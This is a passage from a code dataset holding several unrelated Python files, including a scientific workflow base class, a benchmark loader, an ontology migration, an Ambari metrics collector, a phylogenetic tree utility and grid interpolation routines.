binning_fine())\n else:\n h_ibd_lbnl = R.TH1F(name_ibd_lbnl, name_ibd_lbnl,\n nbins_lbnl, binning_lbnl())\n h_ibd_fine = R.TH1F(name_ibd_fine, name_ibd_fine,\n nbins_fine, binning_fine())\n h_acc_lbnl = R.TH1F(name_acc_lbnl, name_acc_lbnl,\n nbins_lbnl, binning_lbnl())\n h_acc_fine = R.TH1F(name_acc_fine, name_acc_fine,\n nbins_fine, binning_fine())\n\n f_ibd.cd()\n h_ibd_lbnl.Write()\n h_ibd_fine.Write()\n\n f_acc.cd()\n h_acc_lbnl.Write()\n h_acc_fine.Write()\n\n f_ibd.Close()\n f_acc.Close()\n\n\ndef gen_hists(tag, config):\n for phase in [1, 2, 3]:\n gen_hists_(phase, tag, config)\n","sub_path":"fit_prep/hist_gen.py","file_name":"hist_gen.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"86709654","text":"\"\"\"\nBase implementation for high level workflow.\n\nThe goal of this design is to make it easy to share\ncode among different variants of the Inferelator workflow.\n\"\"\"\n\nfrom inferelator_ng import utils\nfrom inferelator_ng.utils import Validator as check\nfrom inferelator_ng import default\nfrom inferelator_ng.prior_gs_split_workflow import split_for_cv, remove_prior_circularity\nimport numpy as np\nimport os\nimport datetime\nimport pandas as pd\n\nimport gzip\nimport bz2\n\n\nclass WorkflowBase(object):\n # Common configuration parameters\n input_dir = None\n file_format_settings = default.DEFAULT_PD_INPUT_SETTINGS\n file_format_overrides = dict()\n expression_matrix_file = default.DEFAULT_EXPRESSION_FILE\n tf_names_file = default.DEFAULT_TFNAMES_FILE\n 
meta_data_file = default.DEFAULT_METADATA_FILE\n priors_file = default.DEFAULT_PRIORS_FILE\n gold_standard_file = default.DEFAULT_GOLDSTANDARD_FILE\n output_dir = None\n random_seed = default.DEFAULT_RANDOM_SEED\n num_bootstraps = default.DEFAULT_NUM_BOOTSTRAPS\n\n # Flags to control splitting priors into a prior/gold-standard set\n split_priors_for_gold_standard = False\n split_gold_standard_for_crossvalidation = False\n cv_split_ratio = default.DEFAULT_GS_SPLIT_RATIO\n cv_split_axis = default.DEFAULT_GS_SPLIT_AXIS\n\n # Computed data structures [G: Genes, K: Predictors, N: Conditions\n expression_matrix = None # expression_matrix dataframe [G x N]\n tf_names = None # tf_names list [k,]\n meta_data = None # meta data dataframe [G x ?]\n priors_data = None # priors data dataframe [G x K]\n gold_standard = None # gold standard dataframe [G x K]\n\n # Hold the KVS information\n rank = 0\n kvs = None\n tasks = None\n\n def __init__(self, initialize_mp=True):\n # Connect to KVS and get environment variables\n if initialize_mp:\n self.initialize_multiprocessing()\n self.get_environmentals()\n\n def initialize_multiprocessing(self):\n \"\"\"\n Override this if you want to use something besides KVS for multiprocessing.\n \"\"\"\n from inferelator_ng.kvs_controller import KVSController\n self.kvs = KVSController()\n\n def get_environmentals(self):\n \"\"\"\n Load environmental variables into class variables\n \"\"\"\n for k, v in utils.slurm_envs().items():\n setattr(self, k, v)\n\n def startup(self):\n \"\"\"\n Startup by preprocessing all data into a ready format for regression.\n \"\"\"\n self.startup_run()\n self.startup_finish()\n\n def startup_run(self):\n \"\"\"\n Execute any data preprocessing necessary before regression. Startup_run is mostly for reading in data\n \"\"\"\n raise NotImplementedError # implement in subclass\n\n def startup_finish(self):\n \"\"\"\n Execute any data preprocessing necessary before regression. 
Startup_finish is mostly for preprocessing data\n prior to regression\n \"\"\"\n raise NotImplementedError # implement in subclass\n\n def run(self):\n \"\"\"\n Execute workflow, after all configuration.\n \"\"\"\n raise NotImplementedError # implement in subclass\n\n def get_data(self):\n \"\"\"\n Read data files in to data structures.\n \"\"\"\n\n self.read_expression()\n self.read_tfs()\n self.read_metadata()\n self.set_gold_standard_and_priors()\n\n def read_expression(self, file=None):\n \"\"\"\n Read expression matrix file into expression_matrix\n \"\"\"\n if file is None:\n file = self.expression_matrix_file\n self.expression_matrix = self.input_dataframe(file)\n\n def read_tfs(self, file=None):\n \"\"\"\n Read tf names file into tf_names\n \"\"\"\n if file is None:\n file = self.tf_names_file\n\n tfs = self.input_dataframe(file, index_col=None)\n assert tfs.shape[1] == 1\n self.tf_names = tfs.values.flatten().tolist()\n\n def read_metadata(self, file=None):\n \"\"\"\n Read metadata file into meta_data or make fake metadata\n \"\"\"\n if file is None:\n file = self.meta_data_file\n\n try:\n self.meta_data = self.input_dataframe(file, index_col=None)\n except IOError:\n self.meta_data = self.create_default_meta_data(self.expression_matrix)\n\n def set_gold_standard_and_priors(self):\n \"\"\"\n Read priors file into priors_data and gold standard file into gold_standard\n \"\"\"\n self.priors_data = self.input_dataframe(self.priors_file)\n\n if self.split_priors_for_gold_standard:\n self.split_priors_into_gold_standard()\n else:\n self.gold_standard = self.input_dataframe(self.gold_standard_file)\n\n if self.split_gold_standard_for_crossvalidation:\n self.cross_validate_gold_standard()\n\n try:\n check.index_values_unique(self.priors_data.index)\n except ValueError as v_err:\n utils.Debug.vprint(\"Duplicate gene(s) in prior index\", level=0)\n utils.Debug.vprint(str(v_err), level=0)\n\n try:\n check.index_values_unique(self.priors_data.columns)\n except ValueError as v_err:\n utils.Debug.vprint(\"Duplicate tf(s) in prior index\", level=0)\n utils.Debug.vprint(str(v_err), level=0)\n\n def split_priors_into_gold_standard(self):\n \"\"\"\n Break priors_data in half and give half to the gold standard\n \"\"\"\n\n if self.gold_standard is not None:\n utils.Debug.vprint(\"Existing gold standard is being replaced by a split from the prior\", level=0)\n self.priors_data, self.gold_standard = split_for_cv(self.priors_data,\n self.cv_split_ratio,\n split_axis=self.cv_split_axis,\n seed=self.random_seed)\n\n utils.Debug.vprint(\"Prior split into a prior {pr} and a gold standard {gs}\".format(pr=self.priors_data.shape,\n gs=self.gold_standard.shape),\n level=0)\n\n def cross_validate_gold_standard(self):\n \"\"\"\n Sample the gold standard for crossvalidation, and then remove the new gold standard from the priors\n \"\"\"\n\n utils.Debug.vprint(\"Resampling prior {pr} and gold standard {gs}\".format(pr=self.priors_data.shape,\n gs=self.gold_standard.shape), level=0)\n _, self.gold_standard = split_for_cv(self.gold_standard,\n self.cv_split_ratio,\n split_axis=self.cv_split_axis,\n seed=self.random_seed)\n self.priors_data, self.gold_standard = remove_prior_circularity(self.priors_data, self.gold_standard,\n split_axis=self.cv_split_axis)\n utils.Debug.vprint(\"Selected prior {pr} and gold standard {gs}\".format(pr=self.priors_data.shape,\n gs=self.gold_standard.shape), level=0)\n\n def input_path(self, filename, mode='r'):\n \"\"\"\n Join filename to input_dir\n \"\"\"\n\n if 
filename.endswith(\".gz\"):\n opener = gzip.open\n elif filename.endswith(\".bz2\"):\n opener = bz2.BZ2File\n else:\n opener = open\n\n return opener(os.path.abspath(os.path.join(self.input_dir, filename)), mode=mode)\n\n def input_dataframe(self, filename, index_col=0):\n \"\"\"\n Read a file in as a pandas dataframe\n \"\"\"\n\n file_settings = self.file_format_settings.copy()\n if filename in self.file_format_overrides:\n file_settings.update(self.file_format_overrides[filename])\n\n with self.input_path(filename) as fh:\n return pd.read_table(fh, index_col=index_col, **file_settings)\n\n def append_to_path(self, var_name, to_append):\n \"\"\"\n Add a string to an existing path variable in class\n \"\"\"\n path = getattr(self, var_name, None)\n if path is None:\n raise ValueError(\"Cannot append to None\")\n setattr(self, var_name, os.path.join(path, to_append))\n\n @staticmethod\n def create_default_meta_data(expression_matrix):\n \"\"\"\n Create a meta_data dataframe from basic defaults\n \"\"\"\n metadata_rows = expression_matrix.columns.tolist()\n metadata_defaults = {\"isTs\": \"FALSE\", \"is1stLast\": \"e\", \"prevCol\": \"NA\", \"del.t\": \"NA\", \"condName\": None}\n data = {}\n for key in metadata_defaults.keys():\n data[key] = pd.Series(data=[metadata_defaults[key] if metadata_defaults[key] else i for i in metadata_rows])\n return pd.DataFrame(data)\n\n def filter_expression_and_priors(self):\n \"\"\"\n Guarantee that each row of the prior is in the expression and vice versa.\n Also filter the priors to only includes columns, transcription factors, that are in the tf_names list\n \"\"\"\n expressed_targets = self.expression_matrix.index\n expressed_or_prior = expressed_targets.union(self.priors_data.columns)\n keeper_regulators = expressed_or_prior.intersection(self.tf_names)\n\n if len(keeper_regulators) == 0 or len(expressed_targets) == 0:\n raise ValueError(\"Filtering will result in a priors with at least one axis of 0 length\")\n\n self.priors_data = self.priors_data.loc[expressed_targets, keeper_regulators]\n self.priors_data = pd.DataFrame.fillna(self.priors_data, 0)\n\n def get_bootstraps(self):\n \"\"\"\n Generate sequence of bootstrap parameter objects for run.\n \"\"\"\n col_range = range(self.response.shape[1])\n random_state = np.random.RandomState(seed=self.random_seed)\n return random_state.choice(col_range, size=(self.num_bootstraps, self.response.shape[1])).tolist()\n\n def emit_results(self):\n \"\"\"\n Output result report(s) for workflow run.\n \"\"\"\n raise NotImplementedError # implement in subclass\n\n def is_master(self):\n \"\"\"\n Return True if this is the rank-0 (master) thread\n \"\"\"\n\n if self.rank == 0:\n return True\n else:\n return False\n\n def create_output_dir(self):\n \"\"\"\n Set a default output_dir if nothing is set. 
Create the path if it doesn't exist.\n \"\"\"\n if self.output_dir is None:\n self.output_dir = os.path.join(self.input_dir, datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\n try:\n os.makedirs(self.output_dir)\n except OSError:\n pass\n","sub_path":"inferelator_ng/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":10969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"638720541","text":"import os\n\nfrom glob import glob\n\nfrom s64da_benchmark_toolkit.prepare import PrepareBenchmarkFactory, TableGroup\nfrom benchmarks.htap import htap_loader as loader\nfrom benchmarks.htap.lib.helpers import WAREHOUSES_SF_RATIO\n\n\nclass PrepareBenchmark(PrepareBenchmarkFactory):\n PrepareBenchmarkFactory.PYTHON_LOADER = True\n PrepareBenchmarkFactory.DO_SHUFFLE = True\n\n PrepareBenchmarkFactory.TABLES = (TableGroup(\n 'warehouse',\n 'item',\n 'region',\n 'nation',\n 'supplier'\n ),)\n PrepareBenchmarkFactory.TABLES_ANALYZE = (TableGroup(\n 'district',\n 'customer',\n 'history',\n 'orders',\n 'new_orders',\n 'order_line',\n 'stock',\n 'item',\n 'warehouse',\n ),)\n\n def get_ingest_tasks(self, table):\n data_dir = self.args.data_dir\n if data_dir:\n raise ValueError(\"Cannot use data dir with htap as this doesn't work with the process executor\")\n\n else:\n dsn = self.args.dsn\n start_date = self.args.start_date\n if table in ['item', 'region', 'nation', 'supplier']:\n func_name = 'load_{}'.format(table)\n func = getattr(loader, func_name)\n return [(func, dsn)]\n elif table == 'warehouse':\n warehouses = range(1, self.args.scale_factor*WAREHOUSES_SF_RATIO + 1)\n return [(loader.load_warehouse, dsn, w_id, start_date)\n for w_id in warehouses]\n\n raise ValueError(f'Unknown table {table}')\n","sub_path":"benchmarks/htap/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"401781808","text":"# Copyright (c) 2021, Galois, Inc.\n#\n# All Rights Reserved\n#\n# This material is based upon work supported by the Defense Advanced Research\n# Projects Agency (DARPA) under Contract No. 
FA8750-20-C-0203.\n#\n# Any opinions, findings and conclusions or recommendations expressed in this\n# material are those of the author(s) and do not necessarily reflect the views\n# of the Defense Advanced Research Projects Agency (DARPA).\n\nfrom migration_helpers.name_space import rack\nfrom ontology_changes import AtMost, ChangeCardinality, Commit, RenameProperty\n\nPROV_S = rack(\"PROV-S\")\n\ncommit = Commit(\n    number=\"833ef18f5024fee255f77887de2c8e9bc136e56d\",\n    changes=[\n        # PROV-S.sadl\n        ChangeCardinality(\n            name_space=PROV_S,\n            class_id=\"THING\",\n            property_id=\"identifier\",\n            to_cardinality=AtMost(1),\n        ),\n        ChangeCardinality(\n            name_space=PROV_S,\n            class_id=\"THING\",\n            property_id=\"title\",\n            to_cardinality=AtMost(1),\n        ),\n        ChangeCardinality(\n            name_space=PROV_S,\n            class_id=\"THING\",\n            property_id=\"description\",\n            to_cardinality=AtMost(1),\n        ),\n        ChangeCardinality(\n            name_space=PROV_S,\n            class_id=\"THING\",\n            property_id=\"dataInsertedBy\",\n            to_cardinality=AtMost(1),\n        ),\n        ChangeCardinality(\n            name_space=PROV_S,\n            class_id=\"ENTITY\",\n            property_id=\"wasGeneratedBy\",\n            to_cardinality=AtMost(1),\n        ),\n        ChangeCardinality(\n            name_space=PROV_S,\n            class_id=\"ENTITY\",\n            property_id=\"generatedAtTime\",\n            to_cardinality=AtMost(1),\n        ),\n        ChangeCardinality(\n            name_space=PROV_S,\n            class_id=\"ENTITY\",\n            property_id=\"invalidatedAtTime\",\n            to_cardinality=AtMost(1),\n        ),\n        ChangeCardinality(\n            name_space=PROV_S,\n            class_id=\"ACTIVITY\",\n            property_id=\"startedAtTime\",\n            to_cardinality=AtMost(1),\n        ),\n        ChangeCardinality(\n            name_space=PROV_S,\n            class_id=\"ACTIVITY\",\n            property_id=\"endedAtTime\",\n            to_cardinality=AtMost(1),\n        ),\n        RenameProperty(\n            from_name_space=PROV_S,\n            from_class=\"AGENT\",\n            from_name=\"agentName\",\n            to_name_space=PROV_S,\n            to_class=\"THING\",\n            to_name=\"title\",\n        ),\n    ],\n)\n","sub_path":"migration/rack/commits/commit833ef18f5024fee255f77887de2c8e9bc136e56d.py","file_name":"commit833ef18f5024fee255f77887de2c8e9bc136e56d.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"65686272","text":"#encoding: UTF-8\n\n# Author: Maria Fernanda Rodriguez Hernandes, A01371649\n# Description: this program calculates the VAT (IVA), the tip and the total of a restaurant bill.\n\nnumero = int(input(\"How many dishes did you order? \"))\nsuma = 0\nfor i in range(1, numero + 1):\n    platillo = int(input(\"Enter the cost of dish \" + str(i) + \": \"))\n    suma = suma + platillo\n\n# compute the VAT, tip and total once the loop has accumulated the subtotal\niva = suma * .16\npropina = suma * .15\ntotal = suma + iva + propina\n\nprint(\"the subtotal is:\", suma, \"the VAT is:\", iva, \"the tip is:\", propina, \"the total is:\", total)\n","sub_path":"cuenta.py","file_name":"cuenta.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"48389345","text":"import sys\nimport requests\nfrom collections import defaultdict\nimport json\n\nclass getQueryMetrics:\n\tdef __init__(self,host,port,logger):\n\t\tself.prefix='http://{}:{}/ws/v1/timeline/metrics'.format(host,port)\n\t\tself.host_stats=defaultdict(lambda:defaultdict(lambda:defaultdict(lambda:'NA')))\n\t\tself.service_stats=defaultdict(lambda:defaultdict(lambda:'NA'))\n\t\tself.host_stats_max=defaultdict(lambda:defaultdict(lambda:defaultdict(lambda:'NA')))\n\t\tself.service_stats_max=defaultdict(lambda:defaultdict(lambda:'NA'))\n\t\tself.logger=logger\n\t\tself.ifheaderservice=False\n\t\tself.ifheaderhost=False\n\t\tself.ifheaderservicemax=False\n\t\tself.ifheaderhostmax=False\n\n\tdef fetch_stats(self,query,metricType,metricNames,startTime,endTime,dumpfile,hostname=None,precision=None,appId=None):\n\t\turl=self.prefix+'?metricNames={}{}{}{}&startTime={}&endTime={}'.format(metricNames,'&appId='+appId if appId else '','&hostname='+hostname if hostname else '','&precision='+precision if precision else '',startTime,endTime)\n\t\tresp=requests.get(url,headers={'Accept':'application/json'})\n\t\tself.logger.info(url)\n\t\tif resp.status_code==200:\n\t\t\tself.addToMetrics(query,metricType,json.loads(resp.content)['metrics'])\n\t\tself.dumptofile(query,metricType,metricNames,dumpfile)\n\n\tdef addToMetrics(self,query,metricType,metricList):\n\t\tif metricType=='host':\n\t\t\tfor stat in metricList:\n\t\t\t\tif len(stat['metrics'].keys())>0:\n\t\t\t\t\tself.host_stats[query][stat['hostname']][stat['metricname']]=str(int(sum(stat['metrics'].values())/len(stat['metrics'].keys())))\n\t\t\t\t\tself.host_stats_max[query][stat['hostname']][stat['metricname']]=str(max(stat['metrics'].values()))\n\t\telif metricType=='service':\n\t\t\tfor stat in metricList:\n\t\t\t\tif len(stat['metrics'].keys())>0:\n\t\t\t\t\tself.service_stats[query][stat['metricname']]=str(int(sum(stat['metrics'].values())/len(stat['metrics'].keys())))\n\t\t\t\t\tself.service_stats_max[query][stat['metricname']]=str(max(stat['metrics'].values()))\n\n\tdef dumptofile(self,query,metricType,metricNames,dumpfile):\n\t\tif metricType=='host':\n\t\t\tself.dumpHostStats(query,metricNames,dumpfile)\n\t\telif metricType=='service':\n\t\t\tself.dumpServiceStats(query,metricNames,dumpfile)\n\t\n\tdef dumpServiceStats(self,query,metricList,dumpfile):\n\t\twith open(dumpfile,'a+') as f:\n\t\t\tif not self.ifheaderservice:\n\t\t\t\tf.write(','.join(['query']+sorted(metricList.split(',')))+'\\n')\n\t\t\t\tself.ifheaderservice=True\n\t\t\tf.write(','.join([query]+[str(self.service_stats[query][key]) for key in sorted(metricList.split(','))])+'\\n')\n\t\twith open('_'.join(['max',dumpfile]),'a+') as f:\n\t\t\tif not self.ifheaderservicemax:\n\t\t\t\tf.write(','.join(['query']+sorted(metricList.split(',')))+'\\n')\n\t\t\t\tself.ifheaderservicemax=True\n\t\t\tf.write(','.join([query]+[str(self.service_stats_max[query][key]) for key in sorted(metricList.split(','))])+'\\n')\n\n\tdef 
dumpHostStats(self,query,metricList,dumpfile):\n\t\twith open(dumpfile,'a+') as f:\n\t\t\tif not self.ifheaderhost:\n\t\t\t\tf.write('query,'+','.join(['-'.join([host,metric]) for host in sorted(self.host_stats[query].keys()) for metric in sorted(metricList.split(','))])+'\\n')\n\t\t\t\tself.ifheaderhost=True\n\t\t\tf.write(','.join([query]+[str(self.host_stats[query][host][metric]) for host in sorted(self.host_stats[query].keys()) for metric in sorted(metricList.split(','))])+'\\n')\n\t\twith open('_'.join(['max',dumpfile]),'a+') as f:\n\t\t\tif not self.ifheaderhostmax:\n\t\t\t\tf.write('query,'+','.join(['-'.join([host,metric]) for host in sorted(self.host_stats_max[query].keys()) for metric in sorted(metricList.split(','))])+'\\n')\n\t\t\t\tself.ifheaderhostmax=True\n\t\t\tf.write(','.join([query]+[str(self.host_stats_max[query][host][metric]) for host in sorted(self.host_stats_max[query].keys()) for metric in sorted(metricList.split(','))])+'\\n')\n\n","sub_path":"collect_metrics.py","file_name":"collect_metrics.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"601846212","text":"import json\nfrom enum import Enum\nimport json\nimport pandas as pd\n\nclass NodeType(Enum):\n NODE = 0\n LEAF = 1\n\n\nclass Node():\n def __init__(self, data_dict = None):\n self.parent = None\n self.children = []\n self.branch_attrs = {}\n self.node_attrs = {}\n self.name = None\n self.type = None\n\n if data_dict:\n self.from_dict(data_dict)\n\n def to_dict(self):\n d = {'branch_attrs': self.branch_attrs,\n 'node_attrs': self.node_attrs,\n 'name': self.name}\n if self.children:\n d['children'] = [child.to_dict() for child in self.children]\n\n return d\n\n def from_dict(self, d):\n if 'branch_attrs' in d:\n self.branch_attrs = d['branch_attrs']\n if 'node_attrs' in d:\n self.node_attrs = d['node_attrs']\n self.name = d['name']\n\n if 'children' in d and len(d['children']) > 0:\n self.children = [Node(c) for c in d['children']]\n else:\n self.children = []\n for c in self.children:\n c.parent = self\n\n if self.children:\n self.type = NodeType.NODE\n else:\n self.type = NodeType.LEAF\n\n def descendents(self):\n return self.children + [node for c in self.children for node in c.descendents()]\n\n def get_attr(self, attr):\n if attr in self.branch_attrs:\n if isinstance(self.branch_attrs[attr], dict):\n return self.branch_attrs[attr]['value']\n else:\n return self.branch_attrs[attr]\n\n if attr in self.node_attrs:\n if isinstance(self.node_attrs[attr], dict):\n return self.node_attrs[attr]['value']\n else:\n return self.node_attrs[attr]\n\n def set_attr(self, attr, value, attr_type='node'):\n if value is None:\n return\n if attr_type == 'node':\n self.node_attrs[attr] = {'value': value}\n else:\n self.branch_attrs[attr] = {'value': value}\n\n\n def check(self, conditions):\n \"\"\"Check if the node satisfies conditions, encoded as\n {attr: value} elements in a dict.\"\"\"\n for attr in conditions.keys():\n if self.get_attr(attr) != conditions[attr]:\n return False\n return True\n\nclass Tree():\n def __init__(self, data_dict = None):\n self.root = None\n self.nodes = []\n if data_dict:\n self.from_dict(data_dict)\n\n def to_dict(self):\n return self.root.to_dict()\n\n def from_dict(self, data_dict):\n self.root = Node(data_dict)\n self.nodes = [self.root] + self.root.descendents()\n\n def set_node_attr(self, attr, state):\n for node in self.nodes:\n node.node_attrs[attr] = state\n\n def subset_tree(self, 
nodes_to_keep):\n for node in self.nodes:\n node.children = [c for c in node.children if c in nodes_to_keep]\n self.nodes = nodes_to_keep\n\n def trim_terminal_nodes(self):\n nodes_to_keep = [node for node in self.nodes if\n node.type == NodeType.LEAF or len(node.children) > 0]\n self.subset_tree(nodes_to_keep)\n\n def add_metadata(self, df):\n \"\"\"Merge metadata file containing a 'strain' column.\"\"\"\n df.rename({col: '_'.join(col.split()) for col in df.columns},\n axis=1,\n inplace=True)\n df = df.set_index('strain')\n\n for node in self.nodes:\n if node.name in df.index:\n for col in df.columns:\n val = df.loc[node.name, col]\n try:\n if not pd.isnull(val):\n node.set_attr(col, val)\n except:\n print(\"bad value\")\n print(col, val)\n continue\n\n def filter_nodes(self, attr, value):\n return [node for node in self.nodes if\n node.get_attr(attr) == value]\n\n def rename_nodes(self, attr, save_attr=None, filter=None):\n \"\"\"Reset name to value of attr field.\n If save_attr is specified, save current name to that field.\"\"\"\n for node in self.nodes:\n val = node.get_attr(attr)\n if filter and not node.check(filter):\n continue\n if val and val != \"None\":\n sanitized_val = \"-\".join(val.split())\n print(\"renaming node \", node.name, \" to \", sanitized_val)\n if save_attr:\n node.set_attr(save_attr, node.name)\n node.name = sanitized_val\n\n def drop_by_name(self, names_to_drop, verbose=False):\n if verbose:\n n_leaves_before = self.n_leaves()\n\n nodes_to_keep = [n for n in self.nodes if n.type == NodeType.LEAF and\n n.name not in names_to_drop]\n nodes_to_keep = walk_to_root(nodes_to_keep)\n if self.root not in nodes_to_keep:\n nodes_to_keep.append(self.root)\n\n self.subset_tree(nodes_to_keep)\n\n if verbose:\n n_leaves_after = self.n_leaves()\n\n print(\"Removing \", n_leaves_before - n_leaves_after,\n \" of \", n_leaves_before, \" genomes.\")\n\n def n_leaves(self):\n return len([n for n in self.nodes if n.type == NodeType.LEAF])\n\n\ndef walk_to_root(nodes):\n stack = nodes.copy()\n done = []\n while stack:\n node = stack.pop()\n if node.parent and node.parent not in stack and node.parent not in done:\n stack.append(node.parent)\n done.append(node)\n return done\n\n\ndef walk_to_leaves(nodes):\n stack = nodes.copy()\n done = []\n while stack:\n node = stack.pop()\n for child in node.children:\n if child not in stack and child not in done:\n stack.append(child)\n done.append(node)\n return done\n\n\ndef walk_down(nodes, mode = \"steps\", depth = 1, filter = None):\n if mode == 'steps':\n levels = [nodes.copy()]\n for i in range(depth):\n next_level = []\n for node in levels[-1]:\n next_level.extend(node.children)\n levels.append(next_level)\n done = [node for level in levels for node in level]\n if mode == \"mutations\":\n levels = [nodes.copy()] + [[]]*depth\n done = nodes.copy()\n for i in range(depth + 1):\n j = 0\n while j < len(levels[i]):\n node = levels[i][j]\n for c in node.children:\n distance = i + num_mutations(c)\n if distance < depth + 1:\n if c not in done:\n levels[distance].append(c)\n done.append(c)\n j += 1\n\n if filter:\n done = [n for n in done if filter(n)]\n\n return done\n\ndef num_mutations(node):\n if 'mutations' in node.branch_attrs:\n if 'nuc' in node.branch_attrs['mutations']:\n return len(node.branch_attrs['mutations']['nuc'])\n return 0\n\n\nclass Auspice():\n def __init__(self, filename):\n self.tree = None\n self.js = None\n self.read(filename)\n\n def read(self, filename):\n with open(filename, 'r') as fp:\n self.js = json.load(fp)\n 
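# the loaded JSON stores the root node under the 'tree' key (see write() below)\n            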
self.tree = Tree(self.js['tree'])\n\n def write(self, filename):\n with open(filename, 'w') as fp:\n json.dump(\n {\"meta\": self.js['meta'],\n \"version\": self.js['version'],\n \"tree\": self.tree.to_dict() if self.tree else self.js['tree']},\n fp,\n indent=2\n )","sub_path":"auspicemunging/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"307323831","text":"from __future__ import absolute_import\nimport numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics.pairwise import rbf_kernel as RBF\nplt.style.use('ggplot')\n\ndef regular_grid_interpolation(Z, X):\n '''\n computes interpolation matrix so that X approx W*Z.\n assumes that Z forms a regular grid and does interpolation one dimension at a time\n which interpolation method used for each dimension decided in interpolation_np\n (currently only implemented for equidistant grids in each dimension)\n :param Z: list of p vectors of length M^(1/p)\n :param X: matrix of size N x p\n :return: indices, values and shape for a sparse matrix W: N x M\n '''\n N = X.shape[0] # number of target points\n p = X.shape[1] # number of dimensions\n\n s = 1 # stride to get index right\n M = 1 # number of source grid points\n for i in range(p):\n M *= len(Z[i])\n shape = (N, M) # shape of interpolation matrix\n\n # loop over all dimensions and interpolate each and update indices and coefficients\n for i in range(p):\n ind, val = interpolation_np(Z[i], X[:, i])\n nr_coefficents = ind.shape[1]\n print(nr_coefficents)\n if i == 0:\n values = val\n indices = np.zeros((N, 1))\n else:\n # for each new dimension get new coefficients and multiply with the old ones\n values = np.tile(values[:, :, None], (1, 1, nr_coefficents)) * np.tile(\n np.reshape(val, (N, 1, nr_coefficents)), (1, values.shape[1], 1))\n values = np.reshape(values, (N, -1), order=\"F\")\n # get the new indices for which source points to use and use with the old ones\n indices = np.tile(np.reshape(indices, (-1, 1), order=\"F\"), (1, nr_coefficents)) + s * np.tile(ind, (\n int(values.shape[1] / nr_coefficents), 1))\n s *= len(Z[i])\n ind0 = np.tile(np.arange(N), (1, values.shape[1])) # get indices for which target data points\n values = np.reshape(values, (-1, 1), order=\"F\")\n indices = np.concatenate([np.reshape(ind0, (-1, 1)), np.reshape(indices, (-1, 1), order=\"F\")],1)\n return indices, values, shape\n\n\ndef interpolation_np(source, target):\n '''\n interpolation using numpy assuming 1D points and inducing points equidistant\n for now also assuming only interpolation and no extrapolation\n '''\n n = target.shape[0]\n source = source.flatten()\n target = target.flatten()\n shape = (target.shape[0], source.shape[0])\n delta_s = source[1] - source[0] # distance between each point in the source grid assuming equidistant\n j = np.floor((target - source[0]) / delta_s) # index of the smaller inducing point closest to the target points\n j = j.astype(int)\n j = j.flatten()\n\n rel_dist_to_j = (target - source[0]) / delta_s - j # relative distance to closest smallest point\n rel_dist_to_j = rel_dist_to_j.flatten()\n\n # cubic interpolation\n\n nr_coefficients = 4\n which_coefficients = np.arange(-1,3)\n '''\n\n # linear interpolation\n nr_coefficients = 2\n which_coefficients = np.arange(0, 2)\n '''\n\n indices = np.zeros((nr_coefficients * n, 2))\n values = np.zeros((nr_coefficients * n))\n C = 
np.zeros((target.shape[0], nr_coefficients)) # interpolation coefficients matrix\n I = np.zeros((target.shape[0], nr_coefficients)) # index matrix\n\n # linear interpolation\n # W[np.arange(target.shape[0]),j[:,0]] = 1-rel_dist_to_j\n # W[np.arange(target.shape[0]),j[:,0]+1] = rel_dist_to_j\n\n # coefficients using cubic interpolation (Keys)\n for k in range(nr_coefficients):\n i = which_coefficients[k]\n print(i)\n C[:, k] = cubic_coefficients_np(i - rel_dist_to_j)\n I[:, k] = j + i\n\n return I, C\n\n\ndef linear_coefficients_np(d):\n '''\n computes linear interpolation coefficients\n input\n d: distance to target points\n returns\n w: coefficients\n '''\n w = np.zeros(np.shape(d))\n d = abs(np.copy(d))\n w[(d <= 1) & (d > 0)] = 1 - d[(d <= 1) & (d > 0)]\n\n return w\n\n\ndef cubic_coefficients_np(d):\n '''\n computes interpolation coefficients according to Keys' cubic interpolation\n input\n d: distance to target points\n returns\n w: coefficients\n '''\n w = np.zeros(np.shape(d))\n d = abs(np.copy(d))\n w[(d <= 1) & (d > 0)] = ((1.5 * d[(d <= 1) & (d > 0)] - 2.5) * d[(d <= 1) & (d > 0)]) * d[(d <= 1) & (d > 0)] + 1\n w[(1 < d) & (d <= 2)] = ((-0.5 * d[(1 < d) & (d <= 2)] + 2.5) * d[(1 < d) & (d <= 2)] - 4) * d[\n (1 < d) & (d <= 2)] + 2\n\n return w\n\n\ndef kernel_interpolation(source, target):\n '''\n kernel interpolation assuming 1D points and inducing points equidistant\n for now also assuming only interpolation and no extrapolation\n '''\n delta_s = source[1] - source[0] # distance between each point in the inducing points grid s assuming equidistant\n j = np.floor((target - source[0]) / delta_s) # index of the smaller inducing point closest to the target points\n j = j.astype(int)\n j = j.flatten()\n rel_dist_to_j = (target - source[0]) / delta_s - j # relative distance to closest smallest point\n rel_dist_to_j = rel_dist_to_j.flatten()\n W = np.zeros((target.shape[0], source.shape[0])) # interpolation matrix\n\n # linear interpolation\n # W[np.arange(target.shape[0]),j[:,0]] = 1-rel_dist_to_j\n # W[np.arange(target.shape[0]),j[:,0]+1] = rel_dist_to_j\n\n # coefficients using cubic interpolation (Keys)\n for i in range(-2, 2):\n i = -i\n print(i)\n W[np.arange(target.shape[0]), j + i] = cubic_coefficients_np(-rel_dist_to_j + i)\n\n return W\n\n\ndef cubic_coefficients(d):\n '''\n d: distance to target points\n w: coefficients\n '''\n w = np.zeros(np.shape(d))\n d = abs(np.copy(d))\n w[d <= 1] = ((1.5 * d[d <= 1] - 2.5) * d[d <= 1]) * d[d <= 1] + 1\n w[(1 < d) & (d <= 